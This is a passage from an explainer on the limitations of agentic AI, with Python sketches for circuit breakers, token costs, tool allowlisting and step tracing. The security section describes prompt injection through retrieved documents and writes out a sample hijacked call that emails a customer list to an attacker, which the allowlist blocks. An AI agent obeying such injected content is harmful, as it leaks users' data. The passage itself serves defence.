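            return tool(*args)
        except Exception:
            self.failures[key] += 1  # remember the failure, then let the agent see it
            raise

def fetch(url: str) -> str:
    raise TimeoutError(url)  # simulated dead endpoint

breaker = CircuitBreaker(max_repeats=3)
attempts = 0
message = ""
try:
    while True:  # a naive agent that retries without changing its approach
        try:
            breaker.call(fetch, "https://api.example.com/data")
        except TimeoutError:
            attempts += 1
except CircuitOpen as stop:
    message = str(stop)
print(attempts, message)
```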
Legal RAG (retrieval-augmented generation) systems, one of the more mature deployment patterns, still hallucinate citations between 17% and 33% of the time in 2025 assessments. The overall failure rate for production deployment remains high: one study found that 88% of AI agents fail to reach production from pilot, though those that do reach production deliver significant ROI.
The following table summarizes the main differences between agentic AI systems and the earlier generation of AI assistants and chatbots:
| Dimension | Traditional AI assistant / chatbot | Agentic AI |
|---|---|---|
| Interaction model | Responds to each user prompt individually | Receives a goal and works autonomously through multiple steps |
| Tool access | Limited or none | Broad: web, code execution, APIs, file systems |
| Memory | Typically stateless within a session | Can maintain state across steps; some systems persist memory across sessions |
| Error handling | Returns incorrect answer or fails silently | Can observe errors, retry, or escalate |
| Human involvement | Required for every action | Can operate with minimal human input; human-in-the-loop optional |
| Output type | Text response | Actions taken in the world plus a summary |
| Task length | One exchange | Minutes to hours or longer |
| Risk profile | Misinformation | Misinformation plus irreversible real-world actions |
| Typical interface | Chat window | Background process, dashboard, or embedded in other software |
Beyond reliability, agentic AI faces several structural limitations as of 2026.
Long context degradation: While context windows have grown substantially, LLM attention quality tends to degrade over very long contexts, which means agents that accumulate too much history in a single session can make progressively worse decisions.
Alignment drift: In extended autonomous operation, an agent's behavior can diverge from user intent in ways that are difficult to detect without continuous monitoring. The problem is more acute when agents are coordinating with each other, because misaligned sub-goals can compound.
Cost: Multi-step agentic runs consume many more tokens than single-turn interactions. Complex agent tasks can cost dollars per run on frontier models, which limits scalability for high-volume use cases.
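One reason multi-step runs are expensive is that many agent loops resend the whole conversation (instructions plus every earlier step) on each model call. With a prompt of s tokens, t new tokens per step, and n steps, total input is n·s + t·n(n-1)/2, which grows roughly quadratically in n. The sketch assumes a 2,000-token prompt, 500 new tokens per step, no prompt caching, and a hypothetical price of $3 per million input tokens. All numbers are illustrative, not measurements or any provider's actual rates, and output tokens are ignored.

```python
def total_input_tokens(prompt_tokens: int, tokens_per_step: int, steps: int) -> int:
    """Input tokens for a run where every model call resends the prompt plus all prior steps."""
    # Call k (0-based) sees the prompt plus k earlier steps of history.
    return sum(prompt_tokens + tokens_per_step * k for k in range(steps))

HYPOTHETICAL_USD_PER_MILLION_INPUT_TOKENS = 3.00  # illustrative price, not a real rate card

single = total_input_tokens(prompt_tokens=2_000, tokens_per_step=500, steps=1)
agentic = total_input_tokens(prompt_tokens=2_000, tokens_per_step=500, steps=30)
cost = agentic * HYPOTHETICAL_USD_PER_MILLION_INPUT_TOKENS / 1_000_000
print(single, agentic, round(cost, 2))  # 2000 277500 0.83
```

Doubling the run to 60 steps more than triples the total, to 1,005,000 input tokens, which is why long-running agents on frontier models can reach dollars per run.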
Security exposure: Agents that have access to tools, APIs, and file systems dramatically expand the attack surface compared to read-only assistants. Prompt injection attacks, in which malicious content in a retrieved document hijacks the agent's instructions, are a practical concern in 2025 deployments. The CSO Online assessment in 2025 described the agentic AI boom as "a CISO's worst nightmare" because agents with broad tool access could exfiltrate data or trigger unintended actions if compromised.
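Restricting which tools a given task may call does not stop prompt injection, but it limits what a hijacked agent can do. Below is a minimal sketch of such an allowlist check, assuming a dispatcher like those used for function calling. The tool names and the `guarded_dispatch` helper are hypothetical.

```python
from typing import Any, Callable

class PermissionDenied(Exception):
    """Raised when the model requests a tool this task was not granted."""

def guarded_dispatch(call: dict[str, Any], tools: dict[str, Callable[..., Any]],
                     allowed: set[str]) -> Any:
    """Run a model-requested tool call only if the tool is on this task's allowlist."""
    name = call["name"]
    if name not in allowed or name not in tools:
        raise PermissionDenied(f"tool {name!r} is not permitted for this task")
    return tools[name](**call.get("arguments", {}))

# Hypothetical tools; a summarization task only needs read access.
tools = {
    "read_file": lambda path: f"contents of {path}",
    "send_email": lambda to, body: f"sent to {to}",
}
allowed = {"read_file"}

print(guarded_dispatch({"name": "read_file", "arguments": {"path": "notes.txt"}}, tools, allowed))

# If injected text in notes.txt talked the model into emailing data out, the call is refused.
try:
    guarded_dispatch({"name": "send_email",
                      "arguments": {"to": "attacker@example.com", "body": "customer list"}},
                     tools, allowed)
except PermissionDenied as err:
    print("blocked:", err)
```

The check runs in the host program, outside the model, so it holds even when the model's own instructions have been subverted.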
Explainability: When an agent produces an incorrect result after dozens of steps, tracing the root cause is substantially harder than auditing a single model response. This is a compliance problem in regulated industries such as healthcare and finance.
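One common aid is to record every step an agent takes. The sketch below uses a hypothetical `traced` decorator that logs each call's arguments and its output or error in call order. A failure deep in a run can then be traced back to the step that caused it. The currency-conversion functions are illustrative only.

```python
import functools
from typing import Any, Callable

TRACE: list[dict[str, Any]] = []

def traced(fn: Callable[..., Any]) -> Callable[..., Any]:
    """Record each call's inputs and its output or error, in call order."""
    @functools.wraps(fn)
    def wrapper(*args: Any, **kwargs: Any) -> Any:
        entry: dict[str, Any] = {"step": len(TRACE) + 1, "fn": fn.__name__,
                                 "args": args, "kwargs": kwargs}
        TRACE.append(entry)  # append before running so nested calls get later step numbers
        try:
            entry["output"] = fn(*args, **kwargs)
        except Exception as exc:
            entry["error"] = repr(exc)
            raise
        return entry["output"]
    return wrapper

@traced
def lookup_rate(currency: str) -> float:
    return {"EUR": 1.1, "GBP": 1.3}[currency]  # hypothetical exchange-rate table

@traced
def convert(amount: float, currency: str) -> float:
    return amount * lookup_rate(currency)

convert(100, "EUR")
try:
    convert(100, "JPY")
except KeyError:
    pass

# Nested calls are appended after their caller, so the last error entry is the deepest failure.
root = [entry for entry in TRACE if "error" in entry][-1]
print(root["step"], root["fn"], root["args"], root["error"])
# 4 lookup_rate ('JPY',) KeyError('JPY')
```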
Over-reliance on individual models: Most agentic frameworks depend on a single frontier model for orchestration, which means quality, latency, and cost are all tightly coupled to that model's performance. Model provider outages or price changes propagate directly to agent system availability.